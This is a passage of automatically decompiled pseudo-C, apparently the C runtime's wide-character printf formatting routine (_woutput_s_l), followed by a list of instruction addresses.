																		__edx =  *(__ebp - 0x10);
																		__edx =  *(__ebp - 0x10) | 0x00000020;
																		__eflags = __edx;
																		 *(__ebp - 0x10) = __edx;
																	}
																	goto L69;
																case 2:
																	L82:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																	__eflags =  *(__ebp - 0x10) & 0x00000830;
																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) | 0x00000020;
																		__eflags = __ecx;
																		 *(__ebp - 0x10) = __ecx;
																	}
																	goto L84;
																case 3:
																	L144:
																	 *(__ebp - 0x460) = 7;
																	goto L146;
																case 4:
																	L75:
																	__eax = __ebp + 0x14;
																	 *(__ebp - 0x474) = E0041F270(__ebp + 0x14);
																	__eflags =  *(__ebp - 0x474);
																	if( *(__ebp - 0x474) == 0) {
																		L77:
																		__edx =  *0x4bc060; // 0x408114
																		 *(__ebp - 4) = __edx;
																		__eax =  *(__ebp - 4);
																		 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																		L81:
																		goto L187;
																	}
																	L76:
																	__ecx =  *(__ebp - 0x474);
																	__eflags =  *(__ecx + 4);
																	if( *(__ecx + 4) != 0) {
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																		__eflags =  *(__ebp - 0x10) & 0x00000800;
																		if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																			 *(__ebp - 0xc) = 0;
																			__edx =  *(__ebp - 0x474);
																			__eax =  *(__edx + 4);
																			 *(__ebp - 4) =  *(__edx + 4);
																			__ecx =  *(__ebp - 0x474);
																			__edx =  *__ecx;
																			 *(__ebp - 0x24) =  *__ecx;
																		} else {
																			__edx =  *(__ebp - 0x474);
																			__eax =  *(__edx + 4);
																			 *(__ebp - 4) =  *(__edx + 4);
																			__ecx =  *(__ebp - 0x474);
																			__eax =  *__ecx;
																			asm("cdq");
																			 *__ecx - __edx =  *__ecx - __edx >> 1;
																			 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																			 *(__ebp - 0xc) = 1;
																		}
																		goto L81;
																	}
																	goto L77;
																case 5:
																	L121:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	__edx = __ebp - 0x448;
																	 *(__ebp - 4) = __ebp - 0x448;
																	 *(__ebp - 0x44) = 0x200;
																	__eflags =  *(__ebp - 0x30);
																	if( *(__ebp - 0x30) >= 0) {
																		L123:
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) != 0) {
																			L126:
																			__eflags =  *(__ebp - 0x30) - 0x200;
																			if( *(__ebp - 0x30) > 0x200) {
																				 *(__ebp - 0x30) = 0x200;
																			}
																			L128:
																			__eflags =  *(__ebp - 0x30) - 0xa3;
																			if( *(__ebp - 0x30) > 0xa3) {
																				__ecx =  *(__ebp - 0x30);
																				__ecx =  *(__ebp - 0x30) + 0x15d;
																				 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																				__eflags =  *(__ebp - 0x20);
																				if( *(__ebp - 0x20) == 0) {
																					 *(__ebp - 0x30) = 0xa3;
																				} else {
																					__edx =  *(__ebp - 0x20);
																					 *(__ebp - 4) =  *(__ebp - 0x20);
																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																					 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																				}
																			}
																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																			__edx =  *(__ebp + 0x14);
																			__eax =  *(__edx - 8);
																			__ecx =  *(__edx - 4);
																			 *(__ebp - 0x490) =  *(__edx - 8);
																			 *(__ebp - 0x48c) =  *(__edx - 4);
																			__ecx = __ebp - 0x40;
																			_push(E004103A0(__ebp - 0x40));
																			__edx =  *(__ebp - 0x2c);
																			_push( *(__ebp - 0x2c));
																			__eax =  *(__ebp - 0x30);
																			_push( *(__ebp - 0x30));
																			__ecx =  *(__ebp - 0x454);
																			_push( *(__ebp - 0x454));
																			__edx =  *(__ebp - 0x44);
																			_push( *(__ebp - 0x44));
																			__eax =  *(__ebp - 4);
																			_push( *(__ebp - 4));
																			__ecx = __ebp - 0x490;
																			_push(__ebp - 0x490);
																			__edx =  *0x4bb808; // 0x776010b9
																			E00411D00(__edx) =  *__eax();
																			__esp = __esp + 0x1c;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			__eflags =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				__eflags =  *(__ebp - 0x30);
																				if( *(__ebp - 0x30) == 0) {
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__ecx =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__edx =  *0x4bb814; // 0x776010b9
																					E00411D00(__edx) =  *__eax();
																					__esp = __esp + 8;
																				}
																			}
																			__eax =  *(__ebp - 0x454) & 0x0000ffff;
																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
																			if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																				__eflags =  *(__ebp - 0x10) & 0x00000080;
																				if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__edx =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__eax =  *0x4bb810; // 0x776010b9
																					__eax =  *__eax();
																					__esp = __esp + 8;
																				}
																			}
																			__ecx =  *(__ebp - 4);
																			__edx =  *( *(__ebp - 4));
																			__eflags =  *( *(__ebp - 4)) - 0x2d;
																			if( *( *(__ebp - 4)) == 0x2d) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																				__ecx =  *(__ebp - 4);
																				__ecx =  *(__ebp - 4) + 1;
																				__eflags = __ecx;
																				 *(__ebp - 4) = __ecx;
																			}
																			__edx =  *(__ebp - 4);
																			 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																			do {
																				L187:
																				__eflags =  *(_t674 - 0x28);
																				if( *(_t674 - 0x28) != 0) {
																					goto L212;
																				}
																				goto L188;
																			} while ( *(__ebp - 0x4ec) > 0x37);
																			goto L66;
																		}
																		L124:
																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
																		__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
																		if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
																			goto L126;
																		}
																		L125:
																		 *(__ebp - 0x30) = 1;
																		goto L128;
																	}
																	L122:
																	 *(__ebp - 0x30) = 6;
																	goto L128;
																case 6:
																	L69:
																	 *(__ebp - 0xc) = 1;
																	__ebp + 0x14 = E0041F270(__ebp + 0x14);
																	 *(__ebp - 0x458) = __ax;
																	__ecx =  *(__ebp - 0x10);
																	__ecx =  *(__ebp - 0x10) & 0x00000020;
																	__eflags = __ecx;
																	if(__ecx == 0) {
																		 *(__ebp - 0x448) =  *(__ebp - 0x458);
																	} else {
																		 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
																		 *(__ebp - 0x470) = __dl;
																		 *((char*)(__ebp - 0x46f)) = 0;
																		__ecx = __ebp - 0x40;
																		__eax = E004103A0(__ebp - 0x40);
																		__ecx = __ebp - 0x40;
																		E004103A0(__ebp - 0x40) =  *__eax;
																		__ecx =  *(__ebp - 0x448 + 0xac);
																		__edx = __ebp - 0x470;
																		__eax = __ebp - 0x448;
																		__eax = E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
																		__eflags = __eax;
																		if(__eax < 0) {
																			 *(__ebp - 0x28) = 1;
																		}
																	}
																	__edx = __ebp - 0x448;
																	 *(__ebp - 4) = __ebp - 0x448;
																	 *(__ebp - 0x24) = 1;
																	while(1) {
																		L187:
																		__eflags =  *(_t674 - 0x28);
																		if( *(_t674 - 0x28) != 0) {
																			goto L212;
																		}
																		goto L188;
																	}
																case 7:
																	L141:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
																	L150:
																	__eflags =  *(_t674 - 0x10) & 0x00008000;
																	if(( *(_t674 - 0x10) & 0x00008000) == 0) {
																		_t623 =  *(_t674 - 0x10) & 0x00001000;
																		__eflags = _t623;
																		if(_t623 == 0) {
																			__eflags =  *(_t674 - 0x10) & 0x00000020;
																			if(( *(_t674 - 0x10) & 0x00000020) == 0) {
																				_t625 =  *(_t674 - 0x10) & 0x00000040;
																				__eflags = _t625;
																				if(_t625 == 0) {
																					_t483 = E0041F270(_t674 + 0x14);
																					_t676 = _t676 + 4;
																					__eflags = 0;
																					 *(_t674 - 0x4a0) = _t483;
																					 *(_t674 - 0x49c) = 0;
																				} else {
																					_t556 = E0041F270(_t674 + 0x14);
																					_t676 = _t676 + 4;
																					asm("cdq");
																					 *(_t674 - 0x4a0) = _t556;
																					 *(_t674 - 0x49c) = _t625;
																				}
																			} else {
																				_t671 =  *(_t674 - 0x10) & 0x00000040;
																				__eflags = _t671;
																				if(_t671 == 0) {
																					_t557 = E0041F270(_t674 + 0x14);
																					_t676 = _t676 + 4;
																					asm("cdq");
																					 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
																					 *(_t674 - 0x49c) = _t671;
																				} else {
																					_t560 = E0041F270(_t674 + 0x14);
																					_t676 = _t676 + 4;
																					asm("cdq");
																					 *(_t674 - 0x4a0) = _t560;
																					 *(_t674 - 0x49c) = _t671;
																				}
																			}
																		} else {
																			_t563 = E0041F290(_t674 + 0x14);
																			_t676 = _t676 + 4;
																			 *(_t674 - 0x4a0) = _t563;
																			 *(_t674 - 0x49c) = _t623;
																		}
																	} else {
																		_t564 = E0041F290(_t674 + 0x14);
																		_t676 = _t676 + 4;
																		 *(_t674 - 0x4a0) = _t564;
																		 *(_t674 - 0x49c) = _t621;
																	}
																	__eflags =  *(_t674 - 0x10) & 0x00000040;
																	if(( *(_t674 - 0x10) & 0x00000040) == 0) {
																		goto L167;
																	}
																case 8:
																	L106:
																	__eax = __ebp + 0x14;
																	 *(__ebp - 0x484) = E0041F270(__ebp + 0x14);
																	__eax = E00424120();
																	__eflags = __eax;
																	if(__eax != 0) {
																		L116:
																		__ecx =  *(__ebp - 0x10);
																		__ecx =  *(__ebp - 0x10) & 0x00000020;
																		__eflags = __ecx;
																		if(__ecx == 0) {
																			__ecx =  *(__ebp - 0x484);
																			__edx =  *(__ebp - 0x44c);
																			 *__ecx =  *(__ebp - 0x44c);
																		} else {
																			__edx =  *(__ebp - 0x484);
																			__ax =  *(__ebp - 0x44c);
																			 *( *(__ebp - 0x484)) = __ax;
																		}
																		 *(__ebp - 0x28) = 1;
																		while(1) {
																			L187:
																			__eflags =  *(_t674 - 0x28);
																			if( *(_t674 - 0x28) != 0) {
																				goto L212;
																			}
																			goto L188;
																		}
																	}
																	L107:
																	__ecx = 0;
																	__eflags = 0;
																	if(0 == 0) {
																		 *(__ebp - 0x4f4) = 0;
																	} else {
																		 *(__ebp - 0x4f4) = 1;
																	}
																	__edx =  *(__ebp - 0x4f4);
																	 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
																	__eflags =  *(__ebp - 0x488);
																	if( *(__ebp - 0x488) == 0) {
																		_push(L"(\"\'n\' format specifier disabled\", 0)");
																		_push(0);
																		_push(0x695);
																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																		_push(2);
																		__eax = L0040C820();
																		__esp = __esp + 0x14;
																		__eflags = __eax - 1;
																		if(__eax == 1) {
																			asm("int3");
																		}
																	}
																	__eflags =  *(__ebp - 0x488);
																	if( *(__ebp - 0x488) != 0) {
																		L115:
																		while(1) {
																			L187:
																			__eflags =  *(_t674 - 0x28);
																			if( *(_t674 - 0x28) != 0) {
																				goto L212;
																			}
																			goto L188;
																		}
																	} else {
																		L114:
																		 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																		__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																		 *(__ebp - 0x4cc) = 0xffffffff;
																		__ecx = __ebp - 0x40;
																		__eax = E00410370(__ecx);
																		__eax =  *(__ebp - 0x4cc);
																		goto L225;
																	}
																case 9:
																	goto L0;
																case 0xa:
																	L143:
																	 *(__ebp - 0x30) = 8;
																	goto L144;
																case 0xb:
																	L84:
																	__eflags =  *(__ebp - 0x30) - 0xffffffff;
																	if( *(__ebp - 0x30) != 0xffffffff) {
																		__edx =  *(__ebp - 0x30);
																		 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
																	} else {
																		 *(__ebp - 0x4f0) = 0x7fffffff;
																	}
																	__eax =  *(__ebp - 0x4f0);
																	 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
																	__ecx = __ebp + 0x14;
																	 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																	__eflags =  *(__ebp - 0x10) & 0x00000020;
																	if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																		L98:
																		__eflags =  *(__ebp - 4);
																		if( *(__ebp - 4) == 0) {
																			__ecx =  *0x4bc064; // 0x408104
																			 *(__ebp - 4) = __ecx;
																		}
																		 *(__ebp - 0xc) = 1;
																		__edx =  *(__ebp - 4);
																		 *(__ebp - 0x480) =  *(__ebp - 4);
																		while(1) {
																			L101:
																			__eax =  *(__ebp - 0x47c);
																			__ecx =  *(__ebp - 0x47c);
																			__ecx =  *(__ebp - 0x47c) - 1;
																			 *(__ebp - 0x47c) = __ecx;
																			__eflags =  *(__ebp - 0x47c);
																			if( *(__ebp - 0x47c) == 0) {
																				break;
																			}
																			L102:
																			__edx =  *(__ebp - 0x480);
																			__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
																			__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
																			if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
																				break;
																			}
																			L103:
																			 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
																			 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
																		}
																		L104:
																		__edx =  *(__ebp - 0x480);
																		__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
																		__eflags = __edx;
																		 *(__ebp - 0x24) = __edx;
																		goto L105;
																	} else {
																		L88:
																		__eflags =  *(__ebp - 4);
																		if( *(__ebp - 4) == 0) {
																			__eax =  *0x4bc060; // 0x408114
																			 *(__ebp - 4) = __eax;
																		}
																		__ecx =  *(__ebp - 4);
																		 *(__ebp - 0x478) = __ecx;
																		 *(__ebp - 0x24) = 0;
																		while(1) {
																			L92:
																			__eax =  *(__ebp - 0x24);
																			__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
																			if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
																				break;
																			}
																			L93:
																			__ecx =  *(__ebp - 0x478);
																			__edx =  *__ecx;
																			__eflags =  *__ecx;
																			if( *__ecx == 0) {
																				break;
																			}
																			L94:
																			__ecx = __ebp - 0x40;
																			E004103A0(__ebp - 0x40) =  *(__ebp - 0x478);
																			__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
																			__eax = E00420DA0( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
																			__eflags = __eax;
																			if(__eax != 0) {
																				__edx =  *(__ebp - 0x478);
																				__edx =  *(__ebp - 0x478) + 1;
																				__eflags = __edx;
																				 *(__ebp - 0x478) = __edx;
																			}
																			 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																			 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																			__edx =  *(__ebp - 0x24);
																			__edx =  *(__ebp - 0x24) + 1;
																			__eflags = __edx;
																			 *(__ebp - 0x24) = __edx;
																		}
																		L97:
																		L105:
																		while(1) {
																			L187:
																			__eflags =  *(_t674 - 0x28);
																			if( *(_t674 - 0x28) != 0) {
																				goto L212;
																			}
																			goto L188;
																		}
																	}
																case 0xc:
																	L142:
																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
																	while(1) {
																		L150:
																		__eflags =  *(_t674 - 0x10) & 0x00008000;
																		if(( *(_t674 - 0x10) & 0x00008000) == 0) {
																			_t623 =  *(_t674 - 0x10) & 0x00001000;
																			__eflags = _t623;
																			if(_t623 == 0) {
																				__eflags =  *(_t674 - 0x10) & 0x00000020;
																				if(( *(_t674 - 0x10) & 0x00000020) == 0) {
																					_t625 =  *(_t674 - 0x10) & 0x00000040;
																					__eflags = _t625;
																					if(_t625 == 0) {
																						_t483 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						__eflags = 0;
																						 *(_t674 - 0x4a0) = _t483;
																						 *(_t674 - 0x49c) = 0;
																					} else {
																						_t556 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						asm("cdq");
																						 *(_t674 - 0x4a0) = _t556;
																						 *(_t674 - 0x49c) = _t625;
																					}
																				} else {
																					_t671 =  *(_t674 - 0x10) & 0x00000040;
																					__eflags = _t671;
																					if(_t671 == 0) {
																						_t557 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						asm("cdq");
																						 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
																						 *(_t674 - 0x49c) = _t671;
																					} else {
																						_t560 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						asm("cdq");
																						 *(_t674 - 0x4a0) = _t560;
																						 *(_t674 - 0x49c) = _t671;
																					}
																				}
																			} else {
																				_t563 = E0041F290(_t674 + 0x14);
																				_t676 = _t676 + 4;
																				 *(_t674 - 0x4a0) = _t563;
																				 *(_t674 - 0x49c) = _t623;
																			}
																		} else {
																			_t564 = E0041F290(_t674 + 0x14);
																			_t676 = _t676 + 4;
																			 *(_t674 - 0x4a0) = _t564;
																			 *(_t674 - 0x49c) = _t621;
																		}
																		__eflags =  *(_t674 - 0x10) & 0x00000040;
																		if(( *(_t674 - 0x10) & 0x00000040) == 0) {
																			goto L167;
																		}
																		goto L163;
																	}
																case 0xd:
																	L145:
																	 *(__ebp - 0x460) = 0x27;
																	L146:
																	 *((intOrPtr*)(__ebp - 8)) = 0x10;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																	__eflags =  *(__ebp - 0x10) & 0x00000080;
																	if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																		__edx = 0x30;
																		 *((short*)(__ebp - 0x14)) = __dx;
																		 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
																		__eflags =  *(__ebp - 0x460) + 0x51;
																		 *(__ebp - 0x12) = __ax;
																		 *(__ebp - 0x1c) = 2;
																	}
																	while(1) {
																		L150:
																		__eflags =  *(_t674 - 0x10) & 0x00008000;
																		if(( *(_t674 - 0x10) & 0x00008000) == 0) {
																			_t623 =  *(_t674 - 0x10) & 0x00001000;
																			__eflags = _t623;
																			if(_t623 == 0) {
																				__eflags =  *(_t674 - 0x10) & 0x00000020;
																				if(( *(_t674 - 0x10) & 0x00000020) == 0) {
																					_t625 =  *(_t674 - 0x10) & 0x00000040;
																					__eflags = _t625;
																					if(_t625 == 0) {
																						_t483 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						__eflags = 0;
																						 *(_t674 - 0x4a0) = _t483;
																						 *(_t674 - 0x49c) = 0;
																					} else {
																						_t556 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						asm("cdq");
																						 *(_t674 - 0x4a0) = _t556;
																						 *(_t674 - 0x49c) = _t625;
																					}
																				} else {
																					_t671 =  *(_t674 - 0x10) & 0x00000040;
																					__eflags = _t671;
																					if(_t671 == 0) {
																						_t557 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						asm("cdq");
																						 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
																						 *(_t674 - 0x49c) = _t671;
																					} else {
																						_t560 = E0041F270(_t674 + 0x14);
																						_t676 = _t676 + 4;
																						asm("cdq");
																						 *(_t674 - 0x4a0) = _t560;
																						 *(_t674 - 0x49c) = _t671;
																					}
																				}
																			} else {
																				_t563 = E0041F290(_t674 + 0x14);
																				_t676 = _t676 + 4;
																				 *(_t674 - 0x4a0) = _t563;
																				 *(_t674 - 0x49c) = _t623;
																			}
																		} else {
																			_t564 = E0041F290(_t674 + 0x14);
																			_t676 = _t676 + 4;
																			 *(_t674 - 0x4a0) = _t564;
																			 *(_t674 - 0x49c) = _t621;
																		}
																		__eflags =  *(_t674 - 0x10) & 0x00000040;
																		if(( *(_t674 - 0x10) & 0x00000040) == 0) {
																			goto L167;
																		}
																		goto L163;
																	}
																case 0xe:
																	while(1) {
																		L187:
																		__eflags =  *(_t674 - 0x28);
																		if( *(_t674 - 0x28) != 0) {
																			goto L212;
																		}
																		goto L188;
																	}
															}
														case 8:
															L24:
															__ecx =  *(__ebp - 0x10);
															__ecx =  *(__ebp - 0x10) | 0x00000002;
															 *(__ebp - 0x10) = __ecx;
															goto L27;
														case 9:
															L25:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
															goto L27;
														case 0xa:
															L23:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
															goto L27;
														case 0xb:
															L22:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
															goto L27;
														case 0xc:
															L26:
															__eax =  *(__ebp - 0x10);
															__eax =  *(__ebp - 0x10) | 0x00000008;
															__eflags = __eax;
															 *(__ebp - 0x10) = __eax;
															goto L27;
														case 0xd:
															L27:
															goto L214;
													}
												} else {
													_t642 = 0;
													if(0 == 0) {
														 *(_t674 - 0x4dc) = 0;
													} else {
														 *(_t674 - 0x4dc) = 1;
													}
													 *(_t674 - 0x46c) =  *(_t674 - 0x4dc);
													if( *(_t674 - 0x46c) == 0) {
														_push(L"(\"Incorrect format specifier\", 0)");
														_push(0);
														_push(0x460);
														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
														_push(2);
														_t517 = L0040C820();
														_t676 = _t676 + 0x14;
														if(_t517 == 1) {
															asm("int3");
														}
													}
													L14:
													if( *(_t674 - 0x46c) != 0) {
														goto L16;
													} else {
														 *((intOrPtr*)(L00411810(_t588))) = 0x16;
														E0040C660(_t565, _t588, _t672, _t673, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
														 *(_t674 - 0x4c8) = 0xffffffff;
														E00410370(_t674 - 0x40);
														_t502 =  *(_t674 - 0x4c8);
														L225:
														return E00410900(_t502, _t565,  *(_t674 - 0x48) ^ _t674, _t642, _t672, _t673);
													}
												}
											}
											L215:
											__eflags =  *(_t674 - 0x45c);
											if( *(_t674 - 0x45c) == 0) {
												L218:
												 *(_t674 - 0x4f8) = 1;
												L219:
												_t642 =  *(_t674 - 0x4f8);
												 *(_t674 - 0x4bc) =  *(_t674 - 0x4f8);
												__eflags =  *(_t674 - 0x4bc);
												if( *(_t674 - 0x4bc) == 0) {
													_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
													_push(0);
													_push(0x8f5);
													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
													_push(2);
													_t507 = L0040C820();
													_t676 = _t676 + 0x14;
													__eflags = _t507 - 1;
													if(_t507 == 1) {
														asm("int3");
													}
												}
												__eflags =  *(_t674 - 0x4bc);
												if( *(_t674 - 0x4bc) != 0) {
													 *(_t674 - 0x4d4) =  *(_t674 - 0x44c);
													E00410370(_t674 - 0x40);
													_t502 =  *(_t674 - 0x4d4);
												} else {
													 *((intOrPtr*)(L00411810(_t580))) = 0x16;
													E0040C660(_t565, _t580, _t672, _t673, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
													 *(_t674 - 0x4d0) = 0xffffffff;
													E00410370(_t674 - 0x40);
													_t502 =  *(_t674 - 0x4d0);
												}
												goto L225;
											}
											L216:
											__eflags =  *(_t674 - 0x45c) - 7;
											if( *(_t674 - 0x45c) == 7) {
												goto L218;
											}
											L217:
											 *(_t674 - 0x4f8) = 0;
											goto L219;
										}
									}
									L184:
									__eflags =  *(_t674 - 0x24);
									if( *(_t674 - 0x24) == 0) {
										L186:
										 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
										 *((char*)( *((intOrPtr*)(_t674 - 4)))) = 0x30;
										_t613 =  *(_t674 - 0x24) + 1;
										__eflags = _t613;
										 *(_t674 - 0x24) = _t613;
										goto L187;
									}
									L185:
									__eflags =  *((char*)( *((intOrPtr*)(_t674 - 4)))) - 0x30;
									if( *((char*)( *((intOrPtr*)(_t674 - 4)))) == 0x30) {
										goto L187;
									}
									goto L186;
								}
								L180:
								asm("cdq");
								_t632 =  *(_t674 - 0x4a8);
								 *(_t674 - 0x494) = E00421720(_t632,  *(_t674 - 0x4a4),  *(_t674 - 8), _t631) + 0x30;
								asm("cdq");
								 *(_t674 - 0x4a8) = E004216B0( *(_t674 - 0x4a8),  *(_t674 - 0x4a4),  *(_t674 - 8), _t632);
								 *(_t674 - 0x4a4) = _t632;
								__eflags =  *(_t674 - 0x494) - 0x39;
								if( *(_t674 - 0x494) > 0x39) {
									_t636 =  *(_t674 - 0x494) +  *((intOrPtr*)(_t674 - 0x460));
									__eflags = _t636;
									 *(_t674 - 0x494) = _t636;
								}
								 *((char*)( *((intOrPtr*)(_t674 - 4)))) =  *(_t674 - 0x494);
								 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
								L178:
								_t631 =  *(_t674 - 0x30) - 1;
								 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
								__eflags =  *(_t674 - 0x30);
								if( *(_t674 - 0x30) > 0) {
									goto L180;
								}
								goto L179;
							}
						}
						L165:
						__eflags =  *(_t674 - 0x4a0);
						if( *(_t674 - 0x4a0) >= 0) {
							goto L167;
						}
						goto L166;
						L167:
						 *(_t674 - 0x4a8) =  *(_t674 - 0x4a0);
						 *(_t674 - 0x4a4) =  *(_t674 - 0x49c);
						goto L168;
					}
				}
			}

0x004238a4
0x004238a4
0x004238a4
0x004238a4
0x004238b4
0x004238b6
0x004238b9
0x004238b9
0x004238bf
0x004238bf
0x004238c2
0x004238c2
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x00423982
0x00423987
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423967
0x0042396c
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x00423941
0x00423946
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423925
0x0042392a
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f8
0x004238fd
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238d0
0x004238d5
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399e
0x00000000
0x00000000
0x004239a0
0x004239a0
0x004239a7
0x00000000
0x00000000
0x004239a9
0x004239a9
0x004239b4
0x004239c2
0x004239c7
0x004239cd
0x004239db
0x004239f8
0x004239fb
0x00423a00
0x00423a05
0x00423a0b
0x00423a19
0x00423a19
0x00423a22
0x00423a22
0x00423a0b
0x00423a28
0x00423a2c
0x00423a3d
0x00423a40
0x00423a47
0x00423a49
0x00423a49
0x00423a2e
0x00423a2e
0x00423a2e
0x00423a56
0x00423a5c
0x00423a5e
0x00423a5e
0x00423a6b
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00423a7e
0x00423a84
0x00423a8a
0x00423b07
0x00423b10
0x00423b19
0x00423b1f
0x00423b25
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00423b5a
0x00423b5d
0x00423b60
0x00423b65
0x00423b6a
0x00423b81
0x00423b84
0x00423b9b
0x00423b9e
0x00423ba5
0x00423ba9
0x00423ba9
0x00423b86
0x00423b8b
0x00423b8f
0x00423b8f
0x00423b6c
0x00423b71
0x00423b75
0x00423b75
0x00423b6a
0x00423bb9
0x00423bc2
0x00423bc5
0x00423bdb
0x00423be0
0x00423be0
0x00423bf6
0x00423bfb
0x00423c01
0x00423c04
0x00423c09
0x00423c0c
0x00423c22
0x00423c27
0x00423c27
0x00423c0c
0x00423c2a
0x00423c2e
0x00423ce8
0x00423cfb
0x00423d00
0x00000000
0x00423c34
0x00423c34
0x00423c34
0x00423c38
0x00000000
0x00000000
0x00423c3e
0x00423c41
0x00423c4a
0x00423c50
0x00423c50
0x00423c5f
0x00423c65
0x00423c67
